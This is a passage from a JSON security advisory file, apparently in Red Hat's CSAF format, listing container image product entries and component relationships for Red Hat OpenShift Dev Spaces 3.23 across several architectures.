                    "purl": "pkg:oci/traefik-rhel9@sha256%3Af17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756504388"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
                  "product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/udi-rhel9@sha256%3A53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757028609"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
                  "product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/udi-base-rhel9@sha256%3Aa86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757037884"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "arm64"
          }
        ],
        "category": "vendor",
        "name": "Red Hat"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
